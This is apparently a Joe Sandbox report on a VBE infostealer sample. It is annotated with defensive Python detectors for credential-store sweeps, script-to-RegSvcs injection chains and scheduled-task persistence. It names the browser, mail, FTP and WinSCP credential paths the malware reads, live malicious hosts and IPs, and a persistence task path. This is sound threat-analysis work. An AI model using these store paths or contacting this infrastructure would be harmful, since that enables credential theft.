                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3276, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3276, type: MEMORYSTR
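The accesses listed above (RegSvcs.exe opening the Chrome and Edge Login Data files, the Firefox, Cyberfox, BlackHawk and Thunderbird profiles.ini files, FTP Navigator's Ftplist.txt, and the WinSCP, IncrediMail and Windows Messaging Subsystem registry keys) are exactly the artefacts a host-level rule should key on: no single legitimate program walks the credential stores of a browser, a mail client, an FTP client and an SFTP client in one sitting. The Python below is an added example written for this page, not Joe Sandbox code and not the sample's code. The event records are constructed to mirror the report's lines; the product categories and the allowlist of processes that may legitimately read each store are this example's assumptions.

```python
"""Flag one process sweeping the credential stores of several products.

Added example for this report (not Joe Sandbox code). SAMPLE_EVENTS are
constructed from the file/registry accesses listed above; EXPECTED_READERS
and the category names are assumptions of this example.
"""
import fnmatch
from collections import defaultdict

# (category, event kind, glob): paths from the report with the user and
# profile directories generalised to wildcards. Matching is case-insensitive.
CREDENTIAL_STORES = [
    ("browser", "file", r"*\AppData\Local\Google\Chrome\User Data\*\Login Data"),
    ("browser", "file", r"*\AppData\Local\Microsoft\Edge\User Data\*\Login Data"),
    ("browser", "file", r"*\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("browser", "file", r"*\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"),
    ("browser", "file", r"*\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    ("mail", "file", r"*\AppData\Roaming\Thunderbird\profiles.ini"),
    ("mail", "registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles*"),
    ("mail", "registry", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities*"),
    ("ftp", "file", r"*\FTP Navigator\Ftplist.txt"),
    ("winscp", "registry", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions*"),
]

# Processes that legitimately read each category (assumed; tune per fleet).
EXPECTED_READERS = {
    "browser": {"chrome.exe", "msedge.exe", "firefox.exe", "cyberfox.exe", "blackhawk.exe"},
    "mail": {"thunderbird.exe", "outlook.exe"},
    "ftp": set(),
    "winscp": {"winscp.exe"},
}


def classify_target(kind, target):
    """Return the store category a file/registry target belongs to, or None."""
    lowered = target.lower()
    for category, store_kind, pattern in CREDENTIAL_STORES:
        if store_kind == kind and fnmatch.fnmatchcase(lowered, pattern.lower()):
            return category
    return None


def find_credential_access(events):
    """(process, category, target) for every store read by a non-allowlisted process."""
    hits = []
    for ev in events:
        category = classify_target(ev["op"], ev["target"])
        if category is None:
            continue
        proc = ev["process"].rsplit("\\", 1)[-1].lower()
        if proc in EXPECTED_READERS.get(category, set()):
            continue
        hits.append((proc, category, ev["target"]))
    return hits


def stealer_candidates(events, min_categories=2):
    """Processes that touched stores of at least min_categories distinct products.

    A browser reading its own Login Data is normal; one process reading browser,
    mail, FTP and SFTP stores in a row is the collection pattern shown above.
    """
    seen = defaultdict(set)
    for proc, category, _ in find_credential_access(events):
        seen[proc].add(category)
    return {p: sorted(c) for p, c in seen.items() if len(c) >= min_categories}


# Constructed telemetry mirroring the report; the last two events are benign.
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
SAMPLE_EVENTS = [
    {"process": REGSVCS, "op": "registry", "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"process": REGSVCS, "op": "file", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": REGSVCS, "op": "file", "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"process": REGSVCS, "op": "file", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"process": REGSVCS, "op": "file", "target": r"C:\FTP Navigator\Ftplist.txt"},
    {"process": REGSVCS, "op": "file", "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"process": REGSVCS, "op": "registry", "target": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    {"process": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "op": "file",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": r"C:\Windows\System32\notepad.exe", "op": "file", "target": r"C:\Users\user\Desktop\notes.txt"},
]

if __name__ == "__main__":
    for proc, categories in stealer_candidates(SAMPLE_EVENTS).items():
        print(f"{proc}: read {', '.join(categories)} credential stores")
```

The threshold of two product categories is what separates a stealer from an application reading its own data; lower it to one if the allowlist is trustworthy, and feed it Sysmon event ID 11/12/13 or EDR file and registry telemetry rather than the constructed list.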

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 8.2.RegSvcs.exe.1150000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3276, type: MEMORYSTR
MITRE ATT&CK matrix (a number in front of a technique is the report's count badge as extracted; entries without a number are the matrix's template placeholders with no matching signature)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 211 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 211 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 311 Process Injection | 1 Obfuscated Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 131 Virtualization/Sandbox Evasion | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph ID: 1554388 | Sample: Booking_0731520.vbe | Start date: 12/11/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts: documenthost.store, api.ipify.org
Signatures on the sample node: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

Process tree (graph node numbers in parentheses; a bare number after a process is the graph's count badge as extracted):
wscript.exe (node 8)
    Signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage)
    powershell.exe (node 16, badge 44)
        Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
        RegSvcs.exe (node 19, badges 15 and 2)
            Network: 162.254.34.31:587 from local port 49983, VIVIDHOSTINGUS, United States; api.ipify.org 104.26.12.205:443 from local port 49981, CLOUDFLARENETUS, United States
            Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures
        wermgr.exe (node 23, badge 19)
        conhost.exe (node 25)
wscript.exe (node 11, badge 27)
    Network: documenthost.store 172.67.215.48:443 from local ports 49704 and 49705, CLOUDFLARENETUS, United States
    Signatures: System process connects to network (likely due to code injection or exploit); Potential evasive VBS script found (sleep loop); Suspicious execution chain found
wscript.exe (node 14)
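The graph above is the whole detection story in one picture: a script host spawns PowerShell, PowerShell writes into and injects a PE into RegSvcs.exe (a signed .NET framework utility that never needs a network socket), and that process then looks up its public IP at api.ipify.org and speaks to 162.254.34.31 on TCP 587. The Python below is an added example written for this page, not Joe Sandbox code and not the sample's code; it applies the same reasoning to process-creation and connection telemetry. The process and connection records are constructed to mirror the graph (PID 3276 is the report's RegSvcs.exe PID, the other PIDs are invented), and the lists of script hosts, shells, .NET utilities, SMTP ports and IP-lookup hosts are this example's assumptions.

```python
"""Match the wscript -> powershell -> RegSvcs.exe chain and its network use.

Added example for this report (not Joe Sandbox code). PROCS and CONNS are
constructed to mirror the behaviour graph; the name lists are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Signed .NET framework utilities that loaders start suspended and inject into;
# RegSvcs.exe is the one in this report, the others are common alternatives.
DOTNET_UTILS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
SMTP_PORTS = {25, 465, 587}
IP_LOOKUP_HOSTS = {"api.ipify.org", "checkip.dyndns.org", "icanhazip.com"}


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(procs, pid):
    """Image basenames from pid upward (self first); stops at unknown or cyclic parents."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def find_injection_chains(procs):
    """PIDs of .NET utilities whose ancestors include both a shell and a script host."""
    hits = []
    for p in procs:
        if basename(p.image) not in DOTNET_UTILS:
            continue
        ancestors = set(ancestry(procs, p.pid)[1:])
        if SHELLS & ancestors and SCRIPT_HOSTS & ancestors:
            hits.append(p.pid)
    return hits


def exfil_indicators(procs, conns):
    """Connections made by a flagged utility, with the reasons an analyst would cite.

    Any socket from a script-spawned RegSvcs.exe is reportable; direct SMTP and a
    public IP lookup (the report's 162.254.34.31:587 and api.ipify.org) are the
    two classic stealer exfiltration tells, so they are called out separately.
    """
    suspects = set(find_injection_chains(procs))
    findings = []
    for pid, dst_ip, dst_port, host in conns:
        if pid not in suspects:
            continue
        reasons = ["socket opened by script-spawned .NET utility"]
        if dst_port in SMTP_PORTS:
            reasons.append(f"direct SMTP to {dst_ip}:{dst_port}")
        if host in IP_LOOKUP_HOSTS:
            reasons.append(f"public IP lookup via {host}")
        findings.append({"pid": pid, "dst": f"{dst_ip}:{dst_port}", "reasons": reasons})
    return findings


# Constructed telemetry mirroring the graph. PID 400 is a benign control case:
# the same binary started from explorer.exe, with no script host in its ancestry.
PROCS = [
    Proc(1, 0, r"C:\Windows\explorer.exe"),
    Proc(100, 1, r"C:\Windows\System32\wscript.exe"),
    Proc(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Proc(3276, 200, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
    Proc(250, 200, r"C:\Windows\System32\conhost.exe"),
    Proc(300, 200, r"C:\Windows\System32\wermgr.exe"),
    Proc(400, 1, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
]
CONNS = [  # (pid, destination IP, destination port, resolved host name)
    (100, "172.67.215.48", 443, "documenthost.store"),
    (3276, "104.26.12.205", 443, "api.ipify.org"),
    (3276, "162.254.34.31", 587, ""),
]

if __name__ == "__main__":
    for finding in exfil_indicators(PROCS, CONNS):
        print(finding["pid"], finding["dst"], "; ".join(finding["reasons"]))
```

The ancestry walk matters more than any single parent-child pair: the injected process's direct parent is powershell.exe, which is common on its own, and the report's wscript.exe is two hops up. Feed the functions Sysmon event ID 1 (process create) and ID 3 (network connect) records and the same logic carries over unchanged.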

Source | Detection | Scanner | Label
Booking_0731520.vbe | 25% | ReversingLabs | Win32.Trojan.Leonem

No Antivirus matches (three further scan tables of the report)

Source | Detection | Scanner | Label
https://documenthost.store/2910/filen | 0% | Avira URL Cloud | safe
https://documenthost.store/2910/r | 0% | Avira URL Cloud | safe
https://documenthost.store/2910/v | 0% | Avira URL Cloud | safe
https://documenthost.store:443/2910/E93ukvxugzIRTSVJZUqI.txt | 0% | Avira URL Cloud | safe
https://documenthost.store/2910/file | 0% | Avira URL Cloud | safe
https://documenthost.store:443/2910/r | 0% | Avira URL Cloud | safe
https://documenthost.store/L | 0% | Avira URL Cloud | safe
https://documenthost.store/2910/s | 0% | Avira URL Cloud | safe
https://documenthost.store/2910/E93ukvxugzIRTSVJZUqI.txt | 0% | Avira URL Cloud | safe
https://documenthost.store:443/2910/file | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
documenthost.store | 172.67.215.48 | true | true | | unknown
api.ipify.org | 104.26.12.205 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://documenthost.store/2910/s | true | Avira URL Cloud: safe | unknown
https://documenthost.store/2910/v | true | Avira URL Cloud: safe | unknown
https://documenthost.store/2910/r | true | Avira URL Cloud: safe | unknown
https://documenthost.store/2910/file | true | Avira URL Cloud: safe | unknown
https://documenthost.store/2910/E93ukvxugzIRTSVJZUqI.txt | true | Avira URL Cloud: safe | unknown

Note that Avira URL Cloud rates every documenthost.store URL as "safe" while the report marks them malicious on behaviour; a URL reputation lookup is not a reason to discount the sandbox verdict.
Name | Source | Malicious | Antivirus Detection | Reputation
https://documenthost.store/2910/filen | wscript.exe, 00000000.00000003.2247215022.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000002.2249046009.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000003.2247957240.000001FE4C763000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org | RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://documenthost.store:443/2910/E93ukvxugzIRTSVJZUqI.txt | wscript.exe, 00000000.00000003.2108162722.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000003.2108624502.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000003.2209476075.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | RegSvcs.exe, 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://documenthost.store/L | wscript.exe, 00000000.00000003.2221847721.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000003.2072222190.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000003.2058132166.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000003.2209476075.000001FE4C723000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://documenthost.store:443/2910/r | wscript.exe, 00000000.00000003.2072048956.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org/t | RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://documenthost.store:443/2910/file | wscript.exe, 00000000.00000003.2247957240.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000002.2249046009.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp; wscript.exe, 00000000.00000003.2246918851.000001FE4C759000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000008.00000002.3296808679.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true
172.67.215.48 | documenthost.store | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554388
Start date and time: 2024-11-12 13:38:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Booking_0731520.vbe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBE@10/12@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 57
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .vbe
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Booking_0731520.vbe
Time | Type | Description
07:39:47 | API Interceptor | 10x Sleep call for process: wscript.exe modified
07:41:05 | API Interceptor | 41x Sleep call for process: powershell.exe modified
07:41:10 | API Interceptor | 18x Sleep call for process: RegSvcs.exe modified
07:41:27 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
13:40:04 | Task Scheduler | Run new task: PPJeBFdmEDGXlnL path: C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs
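The Task Scheduler entry is the persistence mechanism: a new task named PPJeBFdmEDGXlnL whose action is a VBScript dropped under the user's roaming AppData directory. Task definitions live as XML under %SystemRoot%\System32\Tasks, so this is easy to hunt for offline. The Python below is an added example written for this page, not Joe Sandbox code and not the sample's code. The task XML is constructed around the task name and path from the timeline; the trigger type, the benign comparison task, the script-extension list and the set of user-writable path markers are this example's assumptions (the report does not show the task's trigger).

```python
"""Triage Task Scheduler XML for script-based persistence.

Added example for this report (not Joe Sandbox code). The task XML below is
constructed around the timeline entry; the trigger and the benign task are
assumptions, as are the extension and path lists.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Script extensions that the Windows Script Host, PowerShell, cmd or mshta will run.
SCRIPT_RE = re.compile(r'\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd|hta)(?=["\s]|$)')
# Path fragments a standard user can write to (compared case-insensitively).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\", "\\downloads\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}


def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def task_actions(xml_text):
    """Yield (command, arguments) for every Exec action in a task definition."""
    root = ET.fromstring(xml_text)
    for ex in root.findall("t:Actions/t:Exec", NS):
        yield (ex.findtext("t:Command", default="", namespaces=NS).strip(),
               ex.findtext("t:Arguments", default="", namespaces=NS).strip())


def assess_task(name, xml_text):
    """Return the task name, a verdict and the reasons behind it."""
    reasons = []
    for cmd, args in task_actions(xml_text):
        line = f"{cmd} {args}".strip().lower()
        if SCRIPT_RE.search(line):
            reasons.append(f"action runs a script: {line}")
        if any(marker in line for marker in USER_WRITABLE):
            reasons.append("action path is in a user-writable directory")
        if basename(cmd) in SCRIPT_HOSTS:
            reasons.append(f"command is a script host: {basename(cmd)}")
    return {"task": name, "suspicious": bool(reasons), "reasons": reasons}


def read_task_file(path):
    """Task files under System32\\Tasks are UTF-16 XML with a BOM; decode them as such."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


# Constructed task XML mirroring the timeline entry. A LogonTrigger is assumed;
# the command runs the .vbs directly through its file association.
MALICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign comparison: a system binary with plain arguments.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>%SystemRoot%\System32\sc.exe</Command><Arguments>start w32time task_started</Arguments></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("PPJeBFdmEDGXlnL", MALICIOUS_TASK), ("TimeSync", BENIGN_TASK)):
        verdict = assess_task(name, xml_text)
        print(name, "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["reasons"])
```

On a live host, walk %SystemRoot%\System32\Tasks recursively, pass each file through read_task_file and assess_task, and pair the result with the task's creation time (Security event 4698 or the Microsoft-Windows-TaskScheduler/Operational log) to tie it back to the process that registered it.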
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | Ransomware Mallox.exe | malicious | Targeted Ransomware | api.ipify.org/
 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
 | perfcc.elf | malicious | Xmrig | api.ipify.org/
 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
 | hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
 | file.exe | malicious | Unknown | api.ipify.org/
 | file.exe | malicious | Unknown | api.ipify.org/
162.254.34.31 | SWIFTCOPY202973783.vbe | malicious | AgentTesla |
 | D6yz87XjgM.exe | malicious | AgentTesla |
 | Urgent Quotation documents One Pdf.vbs | malicious | AgentTesla |
 | Ref#150689.vbe | malicious | AgentTesla |
 | Request for Best Price Offer.exe | malicious | AgentTesla |
 | EQORY0083009.vbs | malicious | AgentTesla |
 | Order0958490.vbe | malicious | AgentTesla |
 | Ref#0503711.exe | malicious | AgentTesla |
 | Booking_0106.exe | malicious | AgentTesla |
 | Ref_5010_103.exe | malicious | AgentTesla |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | Purchase order.exe | malicious | AgentTesla | 104.26.12.205
 | https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 104.26.13.205
 | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader | 104.26.12.205
 | Swift Copy.bat.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
 | Pago por adelantado_ USD 72000 (50%).exe | malicious | AgentTesla | 104.26.13.205
 | SWIFTCOPY202973783.vbe | malicious | AgentTesla | 104.26.13.205
 | Quotation.exe | malicious | AgentTesla, GuLoader | 172.67.74.152
 | Creal.exe | malicious | Creal Stealer | 104.26.13.205
 | #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe (decoded: Жаркова .exe) | malicious | Blank Grabber, Creal Stealer | 104.26.12.205
 | ypauPrrA08.exe | malicious | Ades Stealer, BlackGuard, VEGA Stealer | 104.26.13.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://spain.recordsbluemountain.com | malicious | Unknown | 188.114.96.3
 | Fizetes_12112024.jpg.img | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253,jpg.img (decoded: Átutalás-megerősítése_469253,jpg.img) | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | DEMASI-24-12B DOC. SCAN.exe | malicious | GuLoader, Remcos | 172.67.216.75
 | https://microsoftatacrisuredbathehatcheragency.birchsstreet.net/ | malicious | Unknown | 104.21.29.37
 | Scan_7341292.pdf | malicious | HTMLPhisher | 104.18.95.41
 | https://t.ly/D5x5U | malicious | Braodo | 162.159.61.3
